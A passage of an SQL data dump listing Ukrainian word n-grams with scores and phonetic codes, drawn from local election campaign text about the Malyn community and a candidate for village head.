що',0,1,1.2667,'з000',1,'*'),(1616541,'знала що в','знала що в',0,1,1.3333,'з000',1,'*'),(1616542,'знатиме','знатиме',0,0,0.4667,'з000',1,'*'),(1616543,'знатиме про','знатиме про',0,1,1.3667,'з000',1,'*'),(1616544,'знатиме про потреби','знатиме про потреби',0,1,1.6333,'з000',1,'*'),(1616545,'знаходиться','знаходиться',0,0,0.7333,'з000',1,'*'),(1616546,'знаходиться наша','знаходиться наша',0,1,1.5333,'з000',1,'*'),(1616547,'знаходиться наша команда','знаходиться наша команда',0,1,1.8,'з000',1,'*'),(1616548,'значить','значить',0,0,0.4667,'з000',1,'*'),(1616549,'значить що','значить що',0,1,1.3333,'з000',1,'*'),(1616550,'значить що він','значить що він',0,1,1.4667,'з000',1,'*'),(1616551,'знаю','знаю',0,0,0.2667,'з000',1,'*'),(1616552,'знаю і','знаю і',0,1,1.2,'з000',1,'*'),(1616553,'знаю і минуле','знаю і минуле',0,1,1.4333,'з000',1,'*'),(1616554,'зразковим','зразковим',0,0,0.6,'з000',1,'*'),(1616555,'зразковим європейським','зразковим європейським',0,1,1.7333,'з000',1,'*'),(1616556,'зразковим європейським містом','зразковим європейським містом',0,1,1.9667,'з000',1,'*'),(1616557,'зробити','зробити',0,0,0.4667,'з000',2,'*'),(1616558,'зробити правильний','зробити правильний',0,1,1.6,'з000',1,'*'),(1616559,'зробити правильний вибір','зробити правильний вибір',0,1,1.8,'з000',1,'*'),(1616560,'зробити такий','зробити такий',0,1,1.4333,'з000',1,'*'),(1616561,'зробити такий аналіз','зробити такий аналіз',0,1,1.6667,'з000',1,'*'),(1616562,'зрозумілим','зрозумілим',0,0,0.6667,'з000',1,'*'),(1616563,'зрозумілим хто','зрозумілим хто',0,1,1.4667,'з000',1,'*'),(1616564,'зрозумілим хто є','зрозумілим хто є',0,1,1.5333,'з000',1,'*'),(1616565,'й досі','й досі',0,1,1.2,'й000',1,'*'),(1616566,'й досі немає','й досі немає',0,1,1.4,'й000',1,'*'),(1616567,'й на розвиток','й на розвиток',0,1,1.4333,'й000',1,'*'),(1616568,'й нинішнє','й нинішнє',0,1,1.3,'й000',1,'*'),(1616569,'й нинішнє керівництво','й нинішнє керівництво',0,1,1.7,'й000',1,'*'),(1616570,'й розвиватись','й розвиватись',0,1,1.4333,'й000',1,'*'),(1616571,'й розвиватись багато','й розвиватись багато',0,1,1.6667,'й000',1,'*'),(1616572,'й ті','й ті',0,1,1.1333,'й000',1,'*'),(1616573,'й ті кому','й ті кому',0,1,1.3,'й000',1,'*'),(1616574,'й чи','й чи',0,1,1.1333,'й000',1,'*'),(1616575,'й чи не','й чи не',0,1,1.2333,'й000',1,'*'),(1616576,'його інтереси','його інтереси',0,1,1.4333,'й000',1,'*'),(1616577,'його інтереси вибивати','його інтереси вибивати',0,1,1.7333,'й000',1,'*'),(1616578,'його будуть','його будуть',0,1,1.3667,'й000',1,'*'),(1616579,'його будуть призначати','його будуть призначати',0,1,1.7333,'й000',1,'*'),(1616580,'його замінити','його замінити',0,1,1.4333,'й000',1,'*'),(1616581,'його замінити на','його замінити на',0,1,1.5333,'й000',1,'*'),(1616582,'його конкретні','його конкретні',0,1,1.4667,'й000',1,'*'),(1616583,'його конкретні справи','його конкретні справи',0,1,1.7,'й000',1,'*'),(1616584,'кандидат','кандидат',0,0,0.5333,'к000',2,'*'),(1616585,'кандидат реалізував','кандидат реалізував',0,1,1.6333,'к000',1,'*'),(1616586,'кандидат реалізував себе','кандидат реалізував себе',0,1,1.8,'к000',1,'*'),(1616587,'кандидата','кандидата',0,0,0.6,'к000',2,'*'),(1616588,'кандидата у','кандидата у',0,1,1.3667,'к000',1,'*'),(1616589,'кандидата у депутати','кандидата у депутати',0,1,1.6667,'к000',1,'*'),(1616590,'кандидати чому','кандидати чому',0,1,1.4667,'к000',1,'*'),(1616591,'кандидати чому віддаєте','кандидати чому віддаєте',0,1,1.7667,'к000',1,'*'),(1616592,'кандидатуру','кандидатуру',0,0,0.7333,'к000',1,'*'),(1616593,'кандидатуру добре','кандидатуру добре',0,1,1.5667,'к000',1,'*'),(1616594,'кандидатуру добре аби','кандидатуру добре аби',0,1,1.7,'к000',1,'*'),(1616595,'керівників','керівників',0,0,0.6667,'к000',1,'*'),(1616596,'керівників усіх','керівників усіх',0,1,1.5,'к000',1,'*'),(1616597,'керівників усіх рангів','керівників усіх рангів',0,1,1.7333,'к000',1,'*'),(1616598,'керівники','керівники',0,0,0.6,'к000',1,'*'),(1616599,'керівники виробничих','керівники виробничих',0,1,1.6667,'к000',1,'*'),(1616600,'керівники виробничих підрозділів','керівники виробничих підрозділів',0,1,2,'к000',1,'*'),(1616601,'керівництво','керівництво',0,0,0.7333,'к000',1,'*'),(1616602,'керівництво мені','керівництво мені',0,1,1.5333,'к000',1,'*'),(1616603,'керівництво мені дороге','керівництво мені дороге',0,1,1.7667,'к000',1,'*'),(1616604,'кладовищ','кладовищ',0,0,0.5333,'к000',1,'*'),(1616605,'кладовищ очистку','кладовищ очистку',0,1,1.5333,'к000',1,'*'),(1616606,'кладовищ очистку вулиць','кладовищ очистку вулиць',0,1,1.7667,'к000',1,'*'),(1616607,'кожен','кожен',0,0,0.3333,'к000',1,'*'),(1616608,'кожен день','кожен день',0,1,1.3333,'к000',1,'*'),(1616609,'кожен день доводилось','кожен день доводилось',0,1,1.7,'к000',1,'*'),(1616610,'кожна','кожна',0,0,0.3333,'к000',2,'*'),(1616611,'кожна людина','кожна людина',0,1,1.4,'к000',1,'*'),(1616612,'кожна людина в','кожна людина в',0,1,1.4667,'к000',1,'*'),(1616613,'кожне','кожне',0,0,0.3333,'к000',1,'*'),(1616614,'кожне село','кожне село',0,1,1.3333,'к000',1,'*'),(1616615,'кожне село самобутнє','кожне село самобутнє',0,1,1.6667,'к000',1,'*'),(1616616,'кожної людини','кожної людини',0,1,1.4333,'к000',1,'*'),(1616617,'кожної людини саме','кожної людини саме',0,1,1.6,'к000',1,'*'),(1616618,'кожної родини','кожної родини',0,1,1.4333,'к000',1,'*'),(1616619,'кожної родини кожної','кожної родини кожної',0,1,1.6667,'к000',1,'*'),(1616620,'коли глибше','коли глибше',0,1,1.3667,'к000',1,'*'),(1616621,'коли глибше аналізуєш','коли глибше аналізуєш',0,1,1.7,'к000',1,'*'),(1616622,'команді','команді',0,0,0.4667,'к000',1,'*'),(1616623,'команді є','команді є',0,1,1.3,'к000',1,'*'),(1616624,'команді є керівники','команді є керівники',0,1,1.6333,'к000',1,'*'),(1616625,'команді в','команді в',0,1,1.3,'к000',1,'*'),(1616626,'команді в якій','команді в якій',0,1,1.4667,'к000',1,'*'),(1616627,'команда','команда',0,0,0.4667,'к000',1,'*'),(1616628,'команда команда','команда команда',0,1,1.5,'к000',1,'*'),(1616629,'команда команда надійних','команда команда надійних',0,1,1.8,'к000',1,'*'),(1616630,'команда надійних','команда надійних',0,1,1.5333,'к000',1,'*'),(1616631,'команда надійних фахово','команда надійних фахово',0,1,1.7667,'к000',1,'*'),(1616632,'команда однодумців','команда однодумців',0,1,1.6,'к000',1,'*'),(1616633,'команда однодумців амбіційних','команда однодумців амбіційних',0,1,1.9667,'к000',1,'*'),(1616634,'команди','команди',0,0,0.4667,'к000',2,'*'),(1616635,'команди це','команди це',0,1,1.3333,'к000',1,'*'),(1616636,'команди це не','команди це не',0,1,1.4333,'к000',1,'*'),(1616637,'команду','команду',0,0,0.4667,'к000',1,'*'),(1616638,'команду не','команду не',0,1,1.3333,'к000',1,'*'),(1616639,'команду не захищати','команду не захищати',0,1,1.6333,'к000',1,'*'),(1616640,'кому','кому',0,0,0.2667,'к000',1,'*'),(1616641,'кому небайдужа','кому небайдужа',0,1,1.4667,'к000',1,'*'),(1616642,'кому небайдужа доля','кому небайдужа доля',0,1,1.6333,'к000',1,'*'),(1616643,'комунальних доріг то','комунальних доріг то',0,1,1.6667,'к000',1,'*'),(1616644,'комусь','комусь',0,0,0.4,'к000',1,'*'),(1616645,'комусь не','комусь не',0,1,1.3,'к000',1,'*'),(1616646,'комусь не сподобається','комусь не сподобається',0,1,1.7333,'к000',1,'*'),(1616647,'комфортно','комфортно',0,0,0.6,'к000',1,'*'),(1616648,'комфортно у','комфортно у',0,1,1.3667,'к000',1,'*'),(1616649,'комфортно у великій','комфортно у великій',0,1,1.6333,'к000',1,'*'),(1616650,'конкретні','конкретні',0,0,0.6,'к000',1,'*'),(1616651,'конкретні справи','конкретні справи',0,1,1.5333,'к000',1,'*'),(1616652,'конкретні справи принесли','конкретні справи принесли',0,1,1.8333,'к000',1,'*'),(1616653,'користь','користь',0,0,0.4667,'к000',1,'*'),(1616654,'користь людям','користь людям',0,1,1.4333,'к000',1,'*'),(1616655,'користь людям та','користь людям та',0,1,1.5333,'к000',1,'*'),(1616656,'котрі','котрі',0,0,0.3333,'к000',1,'*'),(1616657,'котрі вірять','котрі вірять',0,1,1.4,'к000',1,'*'),(1616658,'котрі вірять у','котрі вірять у',0,1,1.4667,'к000',1,'*'),(1616659,'котра','котра',0,0,0.3333,'к000',1,'*'),(1616660,'котра знає','котра знає',0,1,1.3333,'к000',1,'*'),(1616661,'котра знає проблеми','котра знає проблеми',0,1,1.6333,'к000',1,'*'),(1616662,'котрого','котрого',0,0,0.4667,'к000',1,'*'),(1616663,'котрого в','котрого в',0,1,1.3,'к000',1,'*'),(1616664,'котрого в помічниках','котрого в помічниках',0,1,1.6667,'к000',1,'*'),(1616665,'кошик','кошик',0,0,0.3333,'к000',1,'*'),(1616666,'кошик який','кошик який',0,1,1.3333,'к000',1,'*'),(1616667,'кошик який називається','кошик який називається',0,1,1.7333,'к000',1,'*'),(1616668,'кошти','кошти',0,0,0.3333,'к000',1,'*'),(1616669,'кошти акумулюватимуться','кошти акумулюватимуться',0,1,1.7667,'к000',1,'*'),(1616670,'кошти акумулюватимуться в','кошти акумулюватимуться в',0,1,1.8333,'к000',1,'*'),(1616671,'кошти будуть','кошти будуть',0,1,1.4,'к000',1,'*'),(1616672,'кошти будуть потрапляти','кошти будуть потрапляти',0,1,1.7667,'к000',1,'*'),(1616673,'кошти наскільки','кошти наскільки',0,1,1.5,'к000',1,'*'),(1616674,'кошти наскільки розумію','кошти наскільки розумію',0,1,1.7667,'к000',1,'*'),(1616675,'крупним','крупним',0,0,0.4667,'к000',1,'*'),(1616676,'крупним бізнесом','крупним бізнесом',0,1,1.5333,'к000',1,'*'),(1616677,'крупним бізнесом олігархами','крупним бізнесом олігархами',0,1,1.9,'к000',1,'*'),(1616678,'курсі','курсі',0,0,0.3333,'к000',1,'*'),(1616679,'курсі всіх','курсі всіх',0,1,1.3333,'к000',1,'*'),(1616680,'курсі всіх справ','курсі всіх справ',0,1,1.5333,'к000',1,'*'),(1616681,'лікарі','лікарі',0,0,0.4,'л000',1,'*'),(1616682,'лікарі бухгалтера','лікарі бухгалтера',0,1,1.5667,'л000',1,'*'),(1616683,'лікарі бухгалтера робітники','лікарі бухгалтера робітники',0,1,1.9,'л000',1,'*'),(1616684,'ліквідації','ліквідації',0,0,0.6667,'л000',2,'*'),(1616685,'ліквідації сільських','ліквідації сільських',0,1,1.6667,'л000',1,'*'),(1616686,'ліквідації сільських рад','ліквідації сільських рад',0,1,1.8,'л000',1,'*'),(1616687,'ліквідовується','ліквідовується',0,0,0.9333,'л000',1,'*'),(1616688,'ліквідовується і','ліквідовується і',0,1,1.5333,'л000',1,'*'),(1616689,'ліквідовується і кошти','ліквідовується і кошти',0,1,1.7333,'л000',1,'*'),(1616690,'людей із','людей із',0,1,1.2667,'л000',1,'*'),(1616691,'людей із досвідом','людей із досвідом',0,1,1.5667,'л000',1,'*'),(1616692,'людей впевнена','людей впевнена',0,1,1.4667,'л000',1,'*'),(1616693,'людей впевнена що','людей впевнена що',0,1,1.5667,'л000',1,'*'),(1616694,'людей котрі','людей котрі',0,1,1.3667,'л000',1,'*'),(1616695,'людей котрі вірять','людей котрі вірять',0,1,1.6,'л000',1,'*'),(1616696,'людей позбавили','людей позбавили',0,1,1.5,'л000',1,'*'),(1616697,'людей позбавили права','людей позбавили права',0,1,1.7,'л000',1,'*'),(1616698,'люди','люди',0,0,0.2667,'л000',2,'*'),(1616699,'люди жили','люди жили',0,1,1.3,'л000',1,'*'),(1616700,'люди жили заможніше','люди жили заможніше',0,1,1.6333,'л000',1,'*'),(1616701,'люди мають','люди мають',0,1,1.3333,'л000',1,'*'),(1616702,'люди мають добре','люди мають добре',0,1,1.5333,'л000',1,'*'),(1616703,'люди прийшли','люди прийшли',0,1,1.4,'л000',1,'*'),(1616704,'люди прийшли в','люди прийшли в',0,1,1.4667,'л000',1,'*'),(1616705,'люди у','люди у',0,1,1.2,'л000',1,'*'),(1616706,'люди у малинській','люди у малинській',0,1,1.5667,'л000',1,'*'),(1616707,'людина','людина',0,0,0.4,'л000',1,'*'),(1616708,'людина буде','людина буде',0,1,1.3667,'л000',1,'*'),(1616709,'людина буде в','людина буде в',0,1,1.4333,'л000',1,'*'),(1616710,'людина в','людина в',0,1,1.2667,'л000',1,'*'),(1616711,'людина в селі','людина в селі',0,1,1.4333,'л000',1,'*'),(1616712,'людина котра','людина котра',0,1,1.4,'л000',1,'*'),(1616713,'людина котра знає','людина котра знає',0,1,1.5667,'л000',1,'*'),(1616714,'людина якій','людина якій',0,1,1.3667,'л000',1,'*'),(1616715,'людина якій байдуже','людина якій байдуже',0,1,1.6333,'л000',1,'*'),(1616716,'людини','людини',0,0,0.4,'л000',1,'*'),(1616717,'людини саме','людини саме',0,1,1.3667,'л000',1,'*'),(1616718,'людини саме страшне','людини саме страшне',0,1,1.6333,'л000',1,'*'),(1616719,'людьми перейматись','людьми перейматись',0,1,1.6,'л000',1,'*'),(1616720,'людьми перейматись їхніми','людьми перейматись їхніми',0,1,1.8333,'л000',1,'*'),(1616721,'людям та','людям та',0,1,1.2667,'л000',1,'*'),(1616722,'людям та яку','людям та яку',0,1,1.4,'л000',1,'*'),(1616723,'людям у','людям у',0,1,1.2333,'л000',1,'*'),(1616724,'людям у нас','людям у нас',0,1,1.3667,'л000',1,'*'),(1616725,'мінімальний','мінімальний',0,0,0.7333,'м000',2,'*'),(1616726,'мінімальний пакет','мінімальний пакет',0,1,1.5667,'м000',2,'*'),(1616727,'мінімальний пакет фінансування','мінімальний пакет фінансування',0,1,2,'м000',1,'*'),(1616728,'мірятись','мірятись',0,0,0.5333,'м000',1,'*'),(1616729,'мірятись рейтингами','мірятись рейтингами',0,1,1.6333,'м000',1,'*'),(1616730,'мірятись рейтингами з','мірятись рейтингами з',0,1,1.7,'м000',1,'*'),(1616731,'міста','міста',0,0,0.3333,'м000',1,'*'),(1616732,'міста житлово-комунального','міста житлово-комунального',0,1,1.8667,'м000',1,'*'),(1616733,'міста житлово-комунального медичного','міста житлово-комунального медичного',0,1,2,'м000',1,'*'),(1616734,'міста малин','міста малин',0,1,1.3667,'м000',1,'*'),(1616735,'міста малин повинен','міста малин повинен',0,1,1.6333,'м000',1,'*'),(1616736,'міста при','міста при',0,1,1.3,'м000',1,'*'),(1616737,'міста при ліквідації','міста при ліквідації',0,1,1.6667,'м000',1,'*'),(1616738,'міста своєї','міста своєї',0,1,1.3667,'м000',1,'*'),(1616739,'міста своєї громади','міста своєї громади',0,1,1.6333,'м000',1,'*'),(1616740,'містом','містом',0,0,0.4,'м000',1,'*'),(1616741,'містом для','містом для',0,1,1.3333,'м000',1,'*'),(1616742,'містом для цього','містом для цього',0,1,1.5333,'м000',1,'*'),(1616743,'місці роботи','місці роботи',0,1,1.4,'м000',1,'*'),(1616744,'місці роботи які','місці роботи які',0,1,1.5333,'м000',1,'*'),(1616745,'місце просто','місце просто',0,1,1.4,'м000',1,'*'),(1616746,'місце просто піднімати','місце просто піднімати',0,1,1.7333,'м000',1,'*'),(1616747,'місцева','місцева',0,0,0.4667,'м000',3,'*'),(1616748,'місцева людина','місцева людина',0,1,1.4667,'м000',1,'*'),(1616749,'місцева людина буде','місцева людина буде',0,1,1.6333,'м000',1,'*'),(1616750,'місцевих депутатів','місцевих депутатів',0,1,1.6,'м000',1,'*'),(1616751,'місцевих депутатів у','місцевих депутатів у',0,1,1.6667,'м000',1,'*'),(1616752,'місцевих місцева','місцевих місцева',0,1,1.5333,'м000',1,'*'),(1616753,'місцевих місцева людина','місцевих місцева людина',0,1,1.7667,'м000',1,'*'),(1616754,'місцевого','місцевого',0,0,0.6,'м000',1,'*'),(1616755,'місцевого самоврядування','місцевого самоврядування',0,1,1.8,'м000',1,'*'),(1616756,'місцевого самоврядування десять','місцевого самоврядування десять',0,1,2,'м000',1,'*'),(1616757,'місцевого самоврядування дуже','місцевого самоврядування дуже',0,1,1.9667,'м000',1,'*'),(1616758,'місць розвитку','місць розвитку',0,1,1.4667,'м000',1,'*'),(1616759,'місць розвитку інфраструктури','місць розвитку інфраструктури',0,1,1.9667,'м000',1,'*'),(1616760,'міській','міській',0,0,0.4667,'м000',1,'*'),(1616761,'міській раді','міській раді',0,1,1.4,'м000',1,'*'),(1616762,'міській раді у','міській раді у',0,1,1.4667,'м000',1,'*'),(1616763,'міської ради більше','міської ради більше',0,1,1.6333,'м000',1,'*'),(1616764,'міської ради голову','міської ради голову',0,1,1.6333,'м000',1,'*'),(1616765,'міської ради якщо','міської ради якщо',0,1,1.5667,'м000',1,'*'),(1616766,'міську раду а','міську раду а',0,1,1.4333,'м000',1,'*'),(1616767,'маємо намір','маємо намір',0,1,1.3667,'м000',1,'*'),(1616768,'маємо намір працювати','маємо намір працювати',0,1,1.7,'м000',1,'*'),(1616769,'мала','мала',0,0,0.2667,'м000',1,'*'),(1616770,'мала справу','мала справу',0,1,1.3667,'м000',1,'*'),(1616771,'мала справу з','мала справу з',0,1,1.4333,'м000',1,'*'),(1616772,'мали свої','мали свої',0,1,1.3,'м000',1,'*'),(1616773,'мали свої власні','мали свої власні',0,1,1.5333,'м000',1,'*'),(1616774,'малин повинен','малин повинен',0,1,1.4333,'м000',1,'*'),(1616775,'малин повинен стати','малин повинен стати',0,1,1.6333,'м000',1,'*'),(1616776,'малинській','малинській',0,0,0.6667,'м000',1,'*'),(1616777,'малинській громаді','малинській громаді',0,1,1.6,'м000',1,'*'),(1616778,'малинській громаді а','малинській громаді а',0,1,1.6667,'м000',1,'*'),(1616779,'малинській громаді почувались','малинській громаді почувались',0,1,1.9667,'м000',1,'*'),(1616780,'малинської громади','малинської громади',0,1,1.6,'м000',1,'*'),(1616781,'малинської громади чи','малинської громади чи',0,1,1.7,'м000',1,'*'),(1616782,'малинської організації','малинської організації',0,1,1.7333,'м000',1,'*'),(1616783,'малинської організації партії','малинської організації партії',0,1,1.9667,'м000',1,'*'),(1616784,'маріє','маріє',0,0,0.3333,'м000',1,'*'),(1616785,'маріє іванівно','маріє іванівно',0,1,1.4667,'м000',1,'*'),(1616786,'маріє іванівно нинішні','маріє іванівно нинішні',0,1,1.7333,'м000',1,'*'),(1616787,'маріонеткою','маріонеткою',0,0,0.7333,'м000',1,'*'),(1616788,'маріонеткою або','маріонеткою або',0,1,1.5,'м000',1,'*'),(1616789,'маріонеткою або ж','маріонеткою або ж',0,1,1.5667,'м000',1,'*'),(1616790,'марію','марію',0,0,0.3333,'м000',1,'*'),(1616791,'марію насіканову','марію насіканову',0,1,1.5333,'м000',1,'*'),(1616792,'марію насіканову маріє','марію насіканову маріє',0,1,1.7333,'м000',1,'*'),(1616793,'марія насіканова','марія насіканова',0,1,1.5333,'м000',1,'*'),(1616794,'марія насіканова «я','марія насіканова «я',0,1,1.6333,'м000',1,'*'),(1616795,'матиме','матиме',0,0,0.4,'м000',1,'*'),(1616796,'матиме змогу','матиме змогу',0,1,1.4,'м000',1,'*'),(1616797,'матиме змогу нормально','матиме змогу нормально',0,1,1.7333,'м000',1,'*'),(1616798,'маю','маю',0,0,0.2,'м000',1,'*'),(1616799,'маю десять','маю десять',0,1,1.3333,'м000',1,'*'),(1616800,'маю десять років','маю десять років',0,1,1.5333,'м000',1,'*'),(1616801,'мають добре','мають добре',0,1,1.3667,'м000',1,'*'),(1616802,'мають добре зважити','мають добре зважити',0,1,1.6333,'м000',1,'*'),(1616803,'медичного','медичного',0,0,0.6,'м000',1,'*'),(1616804,'медичного обслуговування','медичного обслуговування',0,1,1.8,'м000',1,'*'),(1616805,'медичного обслуговування покращення','медичного обслуговування покращення',0,1,2,'м000',1,'*'),(1616806,'мені','мені',0,0,0.2667,'м000',1,'*'),(1616807,'мені відомо','мені відомо',0,1,1.3667,'м000',1,'*'),(1616808,'мені відомо у','мені відомо у',0,1,1.4333,'м000',1,'*'),(1616809,'мені дороге','мені дороге',0,1,1.3667,'м000',1,'*'),(1616810,'мені дороге село','мені дороге село',0,1,1.5333,'м000',1,'*'),(1616811,'мені сьогодні','мені сьогодні',0,1,1.4333,'м000',1,'*'),(1616812,'мені сьогодні шкода','мені сьогодні шкода',0,1,1.6333,'м000',1,'*'),(1616813,'мешканців','мешканців',0,0,0.6,'м000',1,'*'),(1616814,'мешканців навіть','мешканців навіть',0,1,1.5333,'м000',1,'*'),(1616815,'мешканців навіть не','мешканців навіть не',0,1,1.6333,'м000',1,'*'),(1616816,'ми команда','ми команда',0,1,1.3333,'м000',1,'*'),(1616817,'ми команда однодумців','ми команда однодумців',0,1,1.7,'м000',1,'*'),(1616818,'ми маємо','ми маємо',0,1,1.2667,'м000',1,'*'),(1616819,'ми маємо намір','ми маємо намір',0,1,1.4667,'м000',1,'*'),(1616820,'ми не','ми не',0,1,1.1667,'м000',1,'*'),(1616821,'ми не збираємось','ми не збираємось',0,1,1.5333,'м000',1,'*'),(1616822,'ми не пов\'язані','ми не пов',0,1,1.5,'м000',1,'*'),(1616823,'минуле','минуле',0,0,0.4,'м000',1,'*'),(1616824,'минуле й','минуле й',0,1,1.2667,'м000',1,'*'),(1616825,'минуле й нинішнє','минуле й нинішнє',0,1,1.5333,'м000',1,'*'),(1616826,'може','може',0,0,0.2667,'м000',2,'*'),(1616827,'може потрапити','може потрапити',0,1,1.4667,'м000',1,'*'),(1616828,'може потрапити стороння','може потрапити стороння',0,1,1.7667,'м000',1,'*'),(1616829,'можна було','можна було',0,1,1.3333,'м000',1,'*'),(1616830,'можна було чекати','можна було чекати',0,1,1.5667,'м000',1,'*'),(1616831,'можутьзалишитись','можутьзалишитись',0,0,1,'м000',1,'*'),(1616832,'можутьзалишитись незахищеними','можутьзалишитись незахищеними',0,1,1.9667,'м000',1,'*'),(1616833,'можутьзалишитись незахищеними тому','можутьзалишитись незахищеними тому',0,1,2,'м000',1,'*'),(1616834,'молодим','молодим',0,0,0.4667,'м000',1,'*'),(1616835,'молодим енергійним','молодим енергійним',0,1,1.6,'м000',1,'*'),(1616836,'молодим енергійним людям','молодим енергійним людям',0,1,1.8,'м000',1,'*'),(1616837,'на її','на її',0,1,1.1667,'н000',1,'*'),(1616838,'на її вирішення','на її вирішення',0,1,1.5,'н000',1,'*'),(1616839,'на інші','на інші',0,1,1.2333,'н000',1,'*'),(1616840,'на інші нагальні','на інші нагальні',0,1,1.5333,'н000',1,'*'),(1616841,'на більш','на більш',0,1,1.2667,'н000',1,'*'),(1616842,'на більш вигідну','на більш вигідну',0,1,1.5333,'н000',1,'*'),(1616843,'на вирішення','на вирішення',0,1,1.4,'н000',1,'*'),(1616844,'на вирішення найнеобхідніших','на вирішення найнеобхідніших',0,1,1.9333,'н000',1,'*'),(1616845,'на людей','на людей',0,1,1.2667,'н000',1,'*'),(1616846,'на людей із','на людей із',0,1,1.3667,'н000',1,'*'),(1616847,'на огорожу','на огорожу',0,1,1.3333,'н000',1,'*'),(1616848,'на огорожу кладовищ','на огорожу кладовищ',0,1,1.6333,'н000',1,'*'),(1616849,'на погашення','на погашення',0,1,1.4,'н000',1,'*'),(1616850,'на погашення заборгованості','на погашення заборгованості',0,1,1.9,'н000',1,'*'),(1616851,'на попередньому','на попередньому',0,1,1.5,'н000',1,'*'),(1616852,'на попередньому місці','на попередньому місці',0,1,1.7,'н000',1,'*'),(1616853,'на порожніх','на порожніх',0,1,1.3667,'н000',1,'*'),(1616854,'на порожніх обіцянках','на порожніх обіцянках',0,1,1.7,'н000',1,'*'),(1616855,'на посаду','на посаду',0,1,1.3,'н000',1,'*'),(1616856,'на посаду старости','на посаду старости',0,1,1.6,'н000',1,'*'),(1616857,'на різних','на різних',0,1,1.3,'н000',1,'*'),(1616858,'на різних посадах','на різних посадах',0,1,1.5667,'н000',1,'*'),(1616859,'на рахунку','на рахунку',0,1,1.3333,'н000',1,'*'),(1616860,'на рахунку малинської','на рахунку малинської',0,1,1.7,'н000',1,'*'),(1616861,'на розвиток','на розвиток',0,1,1.3667,'н000',1,'*'),(1616862,'на розвиток сіл','на розвиток сіл',0,1,1.5,'н000',1,'*'),(1616863,'на совість','на совість',0,1,1.3333,'н000',1,'*'),(1616864,'на совість серед','на совість серед',0,1,1.5333,'н000',1,'*'),(1616865,'навіть не','навіть не',0,1,1.3,'н000',1,'*'),(1616866,'навіть не виникала','навіть не виникала',0,1,1.6,'н000',1,'*'),(1616867,'нагальні','нагальні',0,0,0.5333,'н000',1,'*'),(1616868,'нагальні потреби','нагальні потреби',0,1,1.5333,'н000',1,'*'),(1616869,'нагальні потреби міста','нагальні потреби міста',0,1,1.7333,'н000',1,'*'),(1616870,'надійних','надійних',0,0,0.5333,'н000',1,'*'),(1616871,'надійних фахово','надійних фахово',0,1,1.5,'н000',1,'*'),(1616872,'надійних фахово підготовлених','надійних фахово підготовлених',0,1,1.9667,'н000',1,'*'),(1616873,'назад','назад',0,0,0.3333,'н000',1,'*'),(1616874,'назад до','назад до',0,1,1.2667,'н000',1,'*'),(1616875,'назад до влади','назад до влади',0,1,1.4667,'н000',1,'*'),(1616876,'називається','називається',0,0,0.7333,'н000',1,'*'),(1616877,'називається «міський','називається «міський',0,1,1.6667,'н000',1,'*'),(1616878,'називається «міський бюджет».','називається «міський бюджет».',0,1,1.9667,'н000',1,'*'),(1616879,'найнеобхідніших','найнеобхідніших',0,0,1,'н000',1,'*'),(1616880,'найнеобхідніших проблем','найнеобхідніших проблем',0,1,1.7667,'н000',1,'*'),(1616881,'намір','намір',0,0,0.3333,'н000',1,'*'),(1616882,'намір працювати','намір працювати',0,1,1.5,'н000',1,'*'),(1616883,'намір працювати так','намір працювати так',0,1,1.6333,'н000',1,'*'),(1616884,'нас є','нас є',0,1,1.1667,'н000',1,'*'),(1616885,'нас є такі','нас є такі',0,1,1.3333,'н000',1,'*'),(1616886,'нас немає','нас немає',0,1,1.3,'н000',1,'*'),(1616887,'нас немає «товстих','нас немає «товстих',0,1,1.6,'н000',1,'*'),(1616888,'нас хороший','нас хороший',0,1,1.3667,'н000',1,'*'),(1616889,'нас хороший потенціал','нас хороший потенціал',0,1,1.7,'н000',1,'*'),(1616890,'насіканова','насіканова',0,0,0.6667,'н000',2,'*'),(1616891,'насіканова «я','насіканова «я',0,1,1.4333,'н000',1,'*'),(1616892,'насіканова «я не','насіканова «я не',0,1,1.5333,'н000',1,'*'),(1616893,'насіканову','насіканову',0,0,0.6667,'н000',1,'*'),(1616894,'насіканову маріє','насіканову маріє',0,1,1.5333,'н000',1,'*'),(1616895,'насіканову маріє іванівно','насіканову маріє іванівно',0,1,1.8333,'н000',1,'*'),(1616896,'наскільки','наскільки',0,0,0.6,'н000',1,'*'),(1616897,'наскільки мені','наскільки мені',0,1,1.4667,'н000',1,'*'),(1616898,'наскільки мені відомо','наскільки мені відомо',0,1,1.7,'н000',1,'*'),(1616899,'наскільки розумію','наскільки розумію',0,1,1.5667,'н000',1,'*'),(1616900,'наскільки розумію тепер','наскільки розумію тепер',0,1,1.7667,'н000',1,'*'),(1616901,'нашій','нашій',0,0,0.3333,'н000',1,'*'),(1616902,'нашій команді','нашій команді',0,1,1.4333,'н000',1,'*'),(1616903,'нашій команді є','нашій команді є',0,1,1.5,'н000',1,'*'),(1616904,'наша','наша',0,0,0.2667,'н000',1,'*'),(1616905,'наша команда','наша команда',0,1,1.4,'н000',1,'*'),(1616906,'наша команда команда','наша команда команда',0,1,1.6667,'н000',1,'*'),(1616907,'нашої команди','нашої команди',0,1,1.4333,'н000',1,'*'),(1616908,'нашої команди це','нашої команди це',0,1,1.5333,'н000',1,'*'),(1616909,'нашого вибору','нашого вибору',0,1,1.4333,'н000',1,'*'),(1616910,'нашого вибору залежить','нашого вибору залежить',0,1,1.7333,'н000',1,'*'),(1616911,'нашого з','нашого з',0,1,1.2667,'н000',1,'*'),(1616912,'нашого з вами','нашого з вами',0,1,1.4333,'н000',1,'*'),(1616913,'нашу команду','нашу команду',0,1,1.4,'н000',1,'*'),(1616914,'нашу команду не','нашу команду не',0,1,1.5,'н000',1,'*'),(1616915,'не будуть','не будуть',0,1,1.3,'н000',1,'*'),(1616916,'не будуть просто','не будуть просто',0,1,1.5333,'н000',1,'*'),(1616917,'не виникала','не виникала',0,1,1.3667,'н000',1,'*'),(1616918,'не виникала думка','не виникала думка',0,1,1.5667,'н000',1,'*'),(1616919,'не захищати','не захищати',0,1,1.3667,'н000',1,'*'),(1616920,'не захищати власний','не захищати власний',0,1,1.6333,'н000',1,'*'),(1616921,'не збираємось','не збираємось',0,1,1.4333,'н000',1,'*'),(1616922,'не збираємось мірятись','не збираємось мірятись',0,1,1.7333,'н000',1,'*'),(1616923,'не збираюсь','не збираюсь',0,1,1.3667,'н000',1,'*'),(1616924,'не збираюсь піаритись','не збираюсь піаритись',0,1,1.7,'н000',1,'*'),(1616925,'не зможе','не зможе',0,1,1.2667,'н000',1,'*'),(1616926,'не зможе відстоювати','не зможе відстоювати',0,1,1.6667,'н000',1,'*'),(1616927,'не кожної','не кожної',0,1,1.3,'н000',1,'*'),(1616928,'не кожної родини','не кожної 